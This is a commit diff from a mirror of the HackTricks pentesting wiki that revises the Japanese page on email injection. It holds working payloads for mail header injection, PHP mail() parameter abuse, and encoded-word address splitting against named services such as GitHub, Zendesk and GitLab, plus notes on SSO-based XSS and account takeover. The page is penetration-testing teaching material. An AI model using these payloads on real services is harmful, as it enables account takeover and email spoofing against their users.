mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
Translated ['pentesting-web/email-injections.md', 'todo/emails-vulns.md'
This commit is contained in:
parent
81d8f6f135
commit
8322f6f081
2 changed files with 96 additions and 35 deletions
|
@ -840,7 +840,6 @@
|
|||
* [Burp Suite](todo/burp-suite.md)
|
||||
* [Other Web Tricks](todo/other-web-tricks.md)
|
||||
* [Interesting HTTP](todo/interesting-http.md)
|
||||
* [Emails Vulnerabilities](todo/emails-vulns.md)
|
||||
* [Android Forensics](todo/android-forensics.md)
|
||||
* [TR-069](todo/tr-069.md)
|
||||
* [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)
|
||||
|
|
|
@ -3,14 +3,14 @@
|
|||
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築し、自動化**します。\
|
||||
[**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築し、自動化**します。\
|
||||
今すぐアクセスを取得:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
AWSハッキングを学び、実践する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCPハッキングを学び、実践する:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
AWSハッキングを学び、実践する:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCPハッキングを学び、実践する:<img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -18,14 +18,14 @@ GCPハッキングを学び、実践する:<img src="/.gitbook/assets/grte.png
|
|||
|
||||
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
|
||||
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
|
||||
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 送信されたメールに注入する
|
||||
|
||||
### 送信者引数の後にCcとBccを注入する
|
||||
### 送信者引数の後にCcおよびBccを注入する
|
||||
```
|
||||
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
|
||||
```
|
||||
|
@ -37,7 +37,7 @@ From:sender@domain.com%0ATo:attacker@domain.com
|
|||
```
|
||||
メッセージは元の受信者と攻撃者のアカウントに送信されます。
|
||||
|
||||
### Subject引数のインジェクト
|
||||
### Subject引数の注入
|
||||
```
|
||||
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
|
||||
```
|
||||
|
@ -71,7 +71,7 @@ Parameter #4 [ <optional> $additional_parameters ]
|
|||
|
||||
このパラメータは、PHPがバイナリsendmailを呼び出すために使用するコマンドラインに追加されます。ただし、`escapeshellcmd($additional_parameters)`関数でサニタイズされます。
|
||||
|
||||
この場合、攻撃者は**sendmail用の抽出パラメータを注入**することができます。
|
||||
この場合、攻撃者は**sendmail用の抽出パラメータを注入することができます**。
|
||||
|
||||
#### /usr/sbin/sendmailの実装の違い
|
||||
|
||||
|
@ -83,17 +83,21 @@ Parameter #4 [ <optional> $additional_parameters ]
|
|||
* Postfix MTA: http://www.postfix.org/mailq.1.html
|
||||
* Exim MTA: https://linux.die.net/man/8/eximReferences
|
||||
|
||||
**sendmail**バイナリの起源に応じて、悪用するためのさまざまなオプションが発見され、**ファイルを漏洩させたり、任意のコマンドを実行したり**することができます。詳細は[**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)を確認してください。
|
||||
**sendmail**バイナリの起源に応じて、悪用するためのさまざまなオプションが発見され、**ファイルを漏洩させたり、任意のコマンドを実行したりすることができます**。方法については、[**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)を確認してください。
|
||||
|
||||
## Eメール名への注入
|
||||
## メール名に注入
|
||||
|
||||
### Eメールの無視される部分
|
||||
{% hint style="danger" %}
|
||||
任意のドメイン名(Github、Gitlab、CloudFlare Zero trustなど)でアカウントを作成し、確認メールを受信して確認できた場合、被害者企業の機密情報にアクセスできる可能性があります。
|
||||
{% endhint %}
|
||||
|
||||
記号:**+、-**および**{}**は、稀にタグ付けに使用され、ほとんどのEメールサーバーによって無視されることがあります。
|
||||
### メールの無視される部分
|
||||
|
||||
記号:**+、-**および**{}**は、稀にタグ付けに使用され、ほとんどのメールサーバーによって無視されることがあります。
|
||||
|
||||
* 例:john.doe+intigriti@example.com → john.doe@example.com
|
||||
|
||||
**括弧()内のコメント**は、先頭または末尾にある場合も無視されます。
|
||||
**括弧 () の間のコメント**も、先頭または末尾にある場合は無視されます。
|
||||
|
||||
* 例:john.doe(intigriti)@example.com → john.doe@example.com
|
||||
|
||||
|
@ -112,38 +116,96 @@ IPを角括弧で囲んでドメイン名として使用することもできま
|
|||
* john.doe@\[127.0.0.1]
|
||||
* john.doe@\[IPv6:2001:db8::1]
|
||||
|
||||
### その他の脆弱性
|
||||
### メールエンコーディング
|
||||
|
||||
[**この研究**](https://portswigger.net/research/splitting-the-email-atom)で説明されているように、メール名にはエンコードされた文字も含まれることがあります:
|
||||
|
||||
* **PHP 256オーバーフロー**:PHPの`chr`関数は、文字が正の値になるまで256を加え続け、その後`%256`の操作を行います。
|
||||
* `String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @`
|
||||
|
||||
{% hint style="success" %}
|
||||
このトリックの目的は、`RCPT TO:<"collab@psres.net>collab"@example.com>`のような注入を行い、確認メールを予期しない別のメールアドレスに送信させることです(したがって、メール名の中に別のメールアドレスを挿入し、メール送信時に構文を壊すことになります)。
|
||||
{% endhint %}
|
||||
|
||||
異なるエンコーディング:
|
||||
```bash
|
||||
# Format
|
||||
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
|
||||
|
||||
# =? -> Start of encode
|
||||
# utf-8 -> encoding used
|
||||
# ? -> separator
|
||||
# q -> type of encoding
|
||||
# ? -> separator
|
||||
# =41=42=43 -> Hex encoded data
|
||||
# ?= end of encoding
|
||||
|
||||
# Other encodings, same example:
|
||||
# iso-8859-1
|
||||
=?iso-8859-1?q?=61=62=63?=hi@example.com
|
||||
# utf-8
|
||||
=?utf-8?q?=61=62=63?=hi@example.com
|
||||
# utf-7
|
||||
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
|
||||
# q encoding + utf-7
|
||||
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
|
||||
# base64
|
||||
=?utf-8?b?QUJD?=hi@example.com
|
||||
# bas64 + utf-7
|
||||
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
|
||||
#punycode
|
||||
x@xn--svg/-9x6 → x@<svg/
|
||||
```
|
||||
Payloads:
|
||||
|
||||
* Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`
|
||||
* エンコードされた `@` は =40、エンコードされた `>` は `=3e`、null は `=00` 
|
||||
* 確認メールは `collab@psres.net` に送信されます
|
||||
* Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`
|
||||
* 前と同じトリックですが、最初に通常の引用符を追加し、エンコードされた引用符 `=22` をエンコードされた `@` の前に追加し、次のメールの前にいくつかの引用符を開始および閉じて、Zendeskによって内部的に使用される構文を修正します
|
||||
* 確認メールは `collab@psres.net` に送信されます
|
||||
* Gitlab: `=?x?q?collab=40psres.net_?=foo@example.com`
|
||||
* アドレスを区切るためにアンダースコアをスペースとして使用していることに注意してください
|
||||
* 確認メールは `collab@psres.net` に送信されます
|
||||
* Punycode: Punycodeを使用して、Joomlaに `<style` タグを注入し、CSSの流出を通じてCSRFトークンを盗むことが可能でした。
|
||||
|
||||
#### Tooling
|
||||
|
||||
* この種の組み合わせをファズするための**Burp Suite Turbo Intruderスクリプト**があります。スクリプトには、潜在的に機能する組み合わせがすでに含まれています。
|
||||
* [Hackvertor](https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100)を使用して、メール分割攻撃を作成することも可能です。
|
||||
|
||||
### Other vulns
|
||||
|
||||
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
|
||||
|
||||
## サードパーティSSO
|
||||
## Third party SSO
|
||||
|
||||
### XSS
|
||||
|
||||
**github**や**salesforce**のような一部のサービスでは、**XSSペイロードを含むEメールアドレスを作成**することができます。これらのプロバイダーを使用して他のサービスにログインでき、これらのサービスがEメールを正しくサニタイズしていない場合、**XSS**を引き起こす可能性があります。
|
||||
**github**や**salesforce**のような一部のサービスでは、**XSSペイロードを含むメールアドレスを作成することができます**。これらのプロバイダーを使用して他のサービスにログインでき、これらのサービスがメールを正しくサニタイズしていない場合、**XSS**を引き起こす可能性があります。
|
||||
|
||||
### アカウント乗っ取り
|
||||
### Account-Takeover
|
||||
|
||||
**SSOサービス**が**与えられたEメールアドレスを確認せずにアカウントを作成**できる場合(**salesforce**のように)、そのアカウントを使用して**salesforceを信頼する別のサービスにログイン**できると、任意のアカウントにアクセスできる可能性があります。\
|
||||
_salesforceは、与えられたEメールが確認されたかどうかを示しますが、アプリケーションはこの情報を考慮する必要があります。_
|
||||
**SSOサービス**が**指定されたメールアドレスを確認せずにアカウントを作成することを許可する**(**salesforce**のように)場合、そのアカウントを使用して**salesforceを信頼する別のサービスにログイン**できると、任意のアカウントにアクセスできる可能性があります。\
|
||||
_salesforceは指定されたメールが確認されたかどうかを示しますが、アプリケーションはこの情報を考慮する必要があります。_
|
||||
|
||||
## Reply-To
|
||||
|
||||
_**From: company.com**_を使用してメールを送信し、_**Replay-To: attacker.com**_を設定すると、内部アドレスから送信されたために**自動返信**が送信される場合、**攻撃者**はその**応答**を**受け取る**ことができるかもしれません。
|
||||
_**From: company.com**_ を使用してメールを送信し、_**Replay-To: attacker.com**_ を使用すると、内部アドレスから送信されたために自動返信が送信される場合、**攻撃者**はその**応答**を**受け取る**ことができるかもしれません。
|
||||
|
||||
## ハードバウンス率
|
||||
## Hard Bounce Rate
|
||||
|
||||
AWSのような特定のサービスは、**ハードバウンス率**として知られる閾値を実装しており、通常は10%に設定されています。これは、特にEメール配信サービスにとって重要な指標です。この率を超えると、AWSのEメールサービスなどのサービスが停止またはブロックされる可能性があります。
|
||||
AWSのような特定のサービスは、**Hard Bounce Rate**として知られる閾値を実装しており、通常は10%に設定されています。これは、特にメール配信サービスにとって重要な指標です。この率を超えると、AWSのメールサービスなどが停止またはブロックされる可能性があります。
|
||||
|
||||
**ハードバウンス**は、受信者のアドレスが無効または存在しないために送信者に返送された**Eメール**を指します。これは、**Eメール**が存在しないアドレスに送信されたり、実在しないドメインに送信されたり、受信者サーバーが**Eメール**の受け入れを拒否したりするなど、さまざまな理由で発生する可能性があります。
|
||||
**ハードバウンス**は、受信者のアドレスが無効または存在しないために送信者に返された**メール**を指します。これは、**メール**が存在しないアドレスに送信されたり、実在しないドメインに送信されたり、受信者サーバーが**メール**の受け入れを拒否したりするなど、さまざまな理由で発生する可能性があります。
|
||||
|
||||
AWSの文脈では、1000通のEメールを送信し、そのうち100通がハードバウンス(無効なアドレスやドメインなどの理由による)した場合、これは10%のハードバウンス率を意味します。この率に達するか、超えると、AWS SES(Simple Email Service)がEメール送信機能をブロックまたは停止する可能性があります。
|
||||
AWSの文脈では、1000通のメールを送信し、そのうち100通がハードバウンス(無効なアドレスやドメインなどの理由による)した場合、これは10%のハードバウンス率を意味します。この率に達するか超えると、AWS SES(Simple Email Service)がメール送信機能をブロックまたは停止する可能性があります。
|
||||
|
||||
中断のないEメールサービスを確保し、送信者の評判を維持するために、低いハードバウンス率を維持することが重要です。メールリスト内のEメールアドレスの質を監視および管理することは、これを達成するのに大いに役立ちます。
|
||||
中断のないメールサービスを確保し、送信者の評判を維持するために、低いハードバウンス率を維持することが重要です。メールリスト内のメールアドレスの質を監視および管理することは、これを達成するのに大いに役立ちます。
|
||||
|
||||
詳細な情報については、AWSの公式ドキュメントでバウンスと苦情の処理に関する情報を参照できます:[AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types)。
|
||||
詳細な情報については、AWSの公式ドキュメントでバウンスと苦情の処理に関する情報を参照できます [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types)。
|
||||
|
||||
## 参考文献
|
||||
## References
|
||||
|
||||
* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
|
||||
* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
|
||||
|
@ -151,16 +213,16 @@ AWSの文脈では、1000通のEメールを送信し、そのうち100通がハ
|
|||
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWSハッキングを学び、実践する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCPハッキングを学び、実践する:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>HackTricksをサポートする</summary>
|
||||
<summary>Support HackTricks</summary>
|
||||
|
||||
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
|
||||
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
|
||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
@ -168,7 +230,7 @@ GCPハッキングを学び、実践する:<img src="/.gitbook/assets/grte.png
|
|||
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections)を使用して、世界で最も高度なコミュニティツールによって駆動される**ワークフローを簡単に構築および自動化**します。\
|
||||
今すぐアクセスを取得:
|
||||
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
||||
|
|
Loading…
Reference in a new issue